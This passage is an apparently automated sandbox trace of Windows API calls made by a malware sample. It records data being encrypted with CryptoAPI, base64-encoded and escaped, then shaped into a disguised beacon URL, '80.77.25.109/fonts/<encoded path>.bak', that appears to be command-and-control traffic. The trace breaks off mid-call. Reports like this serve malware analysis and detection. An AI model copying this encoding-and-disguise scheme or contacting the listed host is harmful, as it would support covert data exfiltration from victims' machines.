memcpy (in: _Dst=0x11ff044, _Src=0x2c59df8, _Size=0x10 | out: _Dst=0x11ff044) returned 0x11ff044 [0099.406] CryptImportKey (hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070) [0099.406] CryptImportKey (in: hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070 | out: phKey=0x11ff070*=0x77d2f8) returned 1 [0099.407] CryptSetKeyParam (hKey=0x77d2f8, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) [0099.407] CryptSetKeyParam (hKey=0x77d2f8, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) returned 1 [0099.407] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xe0) returned 0x2c59c40 [0099.407] memcpy (in: _Dst=0x2c59c40, _Src=0x2c59b60, _Size=0x10 | out: _Dst=0x2c59c40) returned 0x2c59c40 [0099.407] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c40*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c40*, pdwDataLen=0x11ff074*=0x10) returned 1 [0099.407] memcpy (in: _Dst=0x2c59c50, _Src=0x2c59b70, _Size=0x10 | out: _Dst=0x2c59c50) returned 0x2c59c50 [0099.407] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c50*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c50*, pdwDataLen=0x11ff074*=0x10) returned 1 [0099.407] memcpy (in: _Dst=0x2c59c60, _Src=0x2c59b80, _Size=0x10 | out: _Dst=0x2c59c60) returned 0x2c59c60 [0099.407] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c60*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c60*, pdwDataLen=0x11ff074*=0x10) returned 1 [0099.407] memcpy (in: _Dst=0x2c59c70, _Src=0x2c59b90, _Size=0x10 | out: _Dst=0x2c59c70) returned 0x2c59c70 [0099.407] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c70*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c70*, pdwDataLen=0x11ff074*=0x10) returned 1 [0099.407] memcpy (in: _Dst=0x2c59c80, _Src=0x2c59ba0, _Size=0x10 | out: _Dst=0x2c59c80) returned 0x2c59c80 [0099.407] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c80*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c80*, pdwDataLen=0x11ff074*=0x10) returned 1 [0099.407] memcpy (in: _Dst=0x2c59c90, _Src=0x2c59bb0, _Size=0x10 | out: _Dst=0x2c59c90) returned 0x2c59c90 [0099.407] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c90*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c90*, pdwDataLen=0x11ff074*=0x10) returned 1 [0099.407] memcpy (in: _Dst=0x2c59ca0, _Src=0x2c59bc0, _Size=0x10 | out: _Dst=0x2c59ca0) returned 0x2c59ca0 [0099.407] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ca0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ca0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0099.407] memcpy (in: _Dst=0x2c59cb0, _Src=0x2c59bd0, _Size=0x10 | out: _Dst=0x2c59cb0) returned 0x2c59cb0 [0099.407] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cb0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cb0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0099.407] memcpy (in: _Dst=0x2c59cc0, _Src=0x2c59be0, _Size=0x10 | out: _Dst=0x2c59cc0) returned 0x2c59cc0 [0099.407] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cc0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cc0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0099.407] memcpy (in: _Dst=0x2c59cd0, _Src=0x2c59bf0, _Size=0x10 | out: _Dst=0x2c59cd0) returned 0x2c59cd0 [0099.407] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cd0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cd0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0099.407] memcpy (in: _Dst=0x2c59ce0, _Src=0x2c59c00, _Size=0x10 | out: _Dst=0x2c59ce0) returned 0x2c59ce0 [0099.407] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ce0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ce0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0099.407] memcpy (in: _Dst=0x2c59cf0, _Src=0x2c59c10, _Size=0x10 | out: _Dst=0x2c59cf0) returned 0x2c59cf0 [0099.407] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cf0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cf0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0099.407] memcpy (in: _Dst=0x2c59d00, _Src=0x2c59c20, _Size=0x10 | out: _Dst=0x2c59d00) returned 0x2c59d00 [0099.407] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59d00*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59d00*, pdwDataLen=0x11ff074*=0x10) returned 1 [0099.408] memcpy (in: _Dst=0x2c59d10, _Src=0x2c59c30, _Size=0x5 | out: _Dst=0x2c59d10) returned 0x2c59d10 [0099.408] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2c59d10*, pdwDataLen=0x11ff074*=0x5, dwBufLen=0x20 | out: pbData=0x2c59d10*, pdwDataLen=0x11ff074*=0x10) returned 1 [0099.408] CryptDestroyKey (hKey=0x77d2f8) returned 1 [0099.408] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) [0099.408] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) returned 1 [0099.408] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1c0) returned 0x2c5b520 [0099.408] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c40 | out: hHeap=0x2860000) returned 1 [0099.409] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b60 | out: hHeap=0x2860000) returned 1 [0099.409] StrTrimA (psz="EPT9utPC1ladvBEuonHxwKlNcjSGbwWslTScLE1URuFSvZrRnzfI4cVD6EZGIwOD7hw/h6RfkjaCc1q17nn/etFWvrLVIoi6Kckr3gnwtD4ftDYK5fmSBM1hlhUvTp+Xcktm8N7lKGQokmn1vP26VSJAABlGhG6D7SDOaYdHMEsQ7zM059e214xLxzu+4t6Cadtn6wJZBueE9CH3hWw0fIxnVXcg/K3HoSIvPyqCV67J/2DIbEZPX0guDzr6dMqlh5TFCQuEuGljiH38lcLV2o78PzQAmuDCT9arsqMaetc=", pszTrimChars="\r\n=") [0099.409] StrTrimA (in: psz="EPT9utPC1ladvBEuonHxwKlNcjSGbwWslTScLE1URuFSvZrRnzfI4cVD6EZGIwOD7hw/h6RfkjaCc1q17nn/etFWvrLVIoi6Kckr3gnwtD4ftDYK5fmSBM1hlhUvTp+Xcktm8N7lKGQokmn1vP26VSJAABlGhG6D7SDOaYdHMEsQ7zM059e214xLxzu+4t6Cadtn6wJZBueE9CH3hWw0fIxnVXcg/K3HoSIvPyqCV67J/2DIbEZPX0guDzr6dMqlh5TFCQuEuGljiH38lcLV2o78PzQAmuDCT9arsqMaetc=", pszTrimChars="\r\n=" | out: psz="EPT9utPC1ladvBEuonHxwKlNcjSGbwWslTScLE1URuFSvZrRnzfI4cVD6EZGIwOD7hw/h6RfkjaCc1q17nn/etFWvrLVIoi6Kckr3gnwtD4ftDYK5fmSBM1hlhUvTp+Xcktm8N7lKGQokmn1vP26VSJAABlGhG6D7SDOaYdHMEsQ7zM059e214xLxzu+4t6Cadtn6wJZBueE9CH3hWw0fIxnVXcg/K3HoSIvPyqCV67J/2DIbEZPX0guDzr6dMqlh5TFCQuEuGljiH38lcLV2o78PzQAmuDCT9arsqMaetc") returned 1 [0099.409] lstrlenA (lpString="EPT9utPC1ladvBEuonHxwKlNcjSGbwWslTScLE1URuFSvZrRnzfI4cVD6EZGIwOD7hw/h6RfkjaCc1q17nn/etFWvrLVIoi6Kckr3gnwtD4ftDYK5fmSBM1hlhUvTp+Xcktm8N7lKGQokmn1vP26VSJAABlGhG6D7SDOaYdHMEsQ7zM059e214xLxzu+4t6Cadtn6wJZBueE9CH3hWw0fIxnVXcg/K3HoSIvPyqCV67J/2DIbEZPX0guDzr6dMqlh5TFCQuEuGljiH38lcLV2o78PzQAmuDCT9arsqMaetc") returned 299 [0099.409] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x382) returned 0x2c5b6e8 [0099.409] _snprintf (_Dest=0x2c5b72b, _Count=0x4, _Format="%c%02X") [0099.409] _snprintf (in: _Dest=0x2c5b72b, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0099.409] _snprintf (in: _Dest=0x2c5b73d, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0099.409] _snprintf (in: _Dest=0x2c5b76a, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0099.409] _snprintf (in: _Dest=0x2c5b7a9, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0099.409] _snprintf (in: _Dest=0x2c5b7cc, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0099.409] _snprintf (in: _Dest=0x2c5b7de, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0099.410] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b520 | out: hHeap=0x2860000) returned 1 [0099.410] lstrlenA (lpString="EPT9utPC1ladvBEuonHxwKlNcjSGbwWslTScLE1URuFSvZrRnzfI4cVD6EZGIwOD7hw_2Fh6RfkjaCc1q17nn_2FetFWvrLVIoi6Kckr3gnwtD4ftDYK5fmSBM1hlhUvTp_2BXcktm8N7lKGQokmn1vP26VSJAABlGhG6D7SDOaYdHMEsQ7zM059e214xLxzu_2B4t6Cadtn6wJZBueE9CH3hWw0fIxnVXcg_2FK3HoSIvPyqCV67J_2F2DIbEZPX0guDzr6dMqlh5TFCQuEuGljiH38lcLV2o78PzQAmuDCT9arsqMaetc") returned 311 [0099.410] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x15e) returned 0x2c5b520 [0099.410] memcpy (in: _Dst=0x2c5b520, _Src=0x2c5b6e8, _Size=0x16 | out: _Dst=0x2c5b520) returned 0x2c5b520 [0099.410] memcpy (in: _Dst=0x2c5b537, _Src=0x2c5b6fe, _Size=0xd | out: _Dst=0x2c5b537) returned 0x2c5b537 [0099.410] memcpy (in: _Dst=0x2c5b545, _Src=0x2c5b70b, _Size=0x8 | out: _Dst=0x2c5b545) returned 0x2c5b545 [0099.410] memcpy (in: _Dst=0x2c5b54e, _Src=0x2c5b713, _Size=0x17 | out: _Dst=0x2c5b54e) returned 0x2c5b54e [0099.410] memcpy (in: _Dst=0x2c5b566, _Src=0x2c5b72a, _Size=0xa | out: _Dst=0x2c5b566) returned 0x2c5b566 [0099.410] memcpy (in: _Dst=0x2c5b571, _Src=0x2c5b734, _Size=0x11 | out: _Dst=0x2c5b571) returned 0x2c5b571 [0099.410] memcpy (in: _Dst=0x2c5b583, _Src=0x2c5b745, _Size=0xc | out: _Dst=0x2c5b583) returned 0x2c5b583 [0099.410] memcpy (in: _Dst=0x2c5b590, _Src=0x2c5b751, _Size=0xb | out: _Dst=0x2c5b590) returned 0x2c5b590 [0099.410] memcpy (in: _Dst=0x2c5b59c, _Src=0x2c5b75c, _Size=0xe | out: _Dst=0x2c5b59c) returned 0x2c5b59c [0099.410] memcpy (in: _Dst=0x2c5b5ab, _Src=0x2c5b76a, _Size=0x15 | out: _Dst=0x2c5b5ab) returned 0x2c5b5ab [0099.410] memcpy (in: _Dst=0x2c5b5c1, _Src=0x2c5b77f, _Size=0x10 | out: _Dst=0x2c5b5c1) returned 0x2c5b5c1 [0099.410] memcpy (in: _Dst=0x2c5b5d2, _Src=0x2c5b78f, _Size=0xf | out: _Dst=0x2c5b5d2) returned 0x2c5b5d2 [0099.410] memcpy (in: _Dst=0x2c5b5e2, _Src=0x2c5b79e, _Size=0x12 | out: _Dst=0x2c5b5e2) returned 0x2c5b5e2 [0099.410] memcpy (in: _Dst=0x2c5b5f5, _Src=0x2c5b7b0, _Size=0x9 | out: _Dst=0x2c5b5f5) returned 0x2c5b5f5 [0099.410] memcpy (in: _Dst=0x2c5b5ff, _Src=0x2c5b7b9, _Size=0x14 | out: _Dst=0x2c5b5ff) returned 0x2c5b5ff [0099.410] memcpy (in: _Dst=0x2c5b614, _Src=0x2c5b7cd, _Size=0x13 | out: _Dst=0x2c5b614) returned 0x2c5b614 [0099.410] memcpy (in: _Dst=0x2c5b628, _Src=0x2c5b7e0, _Size=0x16 | out: _Dst=0x2c5b628) returned 0x2c5b628 [0099.410] memcpy (in: _Dst=0x2c5b63f, _Src=0x2c5b7f6, _Size=0xd | out: _Dst=0x2c5b63f) returned 0x2c5b63f [0099.410] memcpy (in: _Dst=0x2c5b64d, _Src=0x2c5b803, _Size=0x8 | out: _Dst=0x2c5b64d) returned 0x2c5b64d [0099.410] memcpy (in: _Dst=0x2c5b656, _Src=0x2c5b80b, _Size=0xf | out: _Dst=0x2c5b656) returned 0x2c5b656 [0099.410] memcpy (in: _Dst=0x2c5b666, _Src=0x2c5b81a, _Size=0x6 | out: _Dst=0x2c5b666) returned 0x2c5b666 [0099.411] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b6e8 | out: hHeap=0x2860000) returned 1 [0099.411] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b40 | out: hHeap=0x2860000) returned 1 [0099.411] StrTrimA (in: psz="EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc", pszTrimChars="\r\n" | out: psz="EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc") returned 0 [0099.411] lstrlenA (lpString="/fonts/") returned 7 [0099.411] lstrlenA (lpString="EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc") returned 331 [0099.411] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x153) returned 0x2c59b28 [0099.411] lstrcpyA (in: lpString1=0x2c59b28, lpString2="/fonts/" | out: lpString1="/fonts/") returned="/fonts/" [0099.411] lstrcatA (in: lpString1="/fonts/", lpString2="EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc" | out: lpString1="/fonts/EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc") returned="/fonts/EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc" [0099.411] lstrcpyA (in: lpString1=0x2c5b520, lpString2=".bak" | out: lpString1=".bak") returned=".bak" [0099.411] lstrcpyA (in: lpString1=0x2c5ad18, lpString2="80.77.25.109" | out: lpString1="80.77.25.109") returned="80.77.25.109" [0099.411] lstrcatA (in: lpString1="80.77.25.109", lpString2="/fonts/EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc" | out: lpString1="80.77.25.109/fonts/EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc") returned="80.77.25.109/fonts/EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc" [0099.411] lstrcatA (in: lpString1="80.77.25.109/fonts/EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc", lpString2=".bak" | out: lpString1="80.77.25.109/fonts/EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc.bak") returned="80.77.25.109/fonts/EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc.bak" [0099.411] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) [0099.411] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c8 [0099.411] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x1c4 [0099.411] lstrlenA (lpString="80.77.25.109/fonts/EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc.bak") returned 354 [0099.412] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x163) returned 0x2c59c88 [0099.412] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x163) returned 0x2c5b688 [0099.412] StrChrA (lpStart="80.77.25.109/fonts/EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc.bak", wMatch=0x2f) returned="/fonts/EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc.bak" [0099.412] StrChrA (lpStart="80.77.25.109/fonts/EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc.bak", wMatch=0x3f) returned 0x0 [0099.412] memcpy (in: _Dst=0x2c59c88, _Src=0x2c5ad18, _Size=0xc | out: _Dst=0x2c59c88) returned 0x2c59c88 [0099.412] lstrcpyA (in: lpString1=0x2c5b688, lpString2="/fonts/EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc.bak" | out: lpString1="/fonts/EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc.bak") returned="/fonts/EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc.bak" [0099.412] lstrlenA (lpString="/fonts/EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc.bak") returned 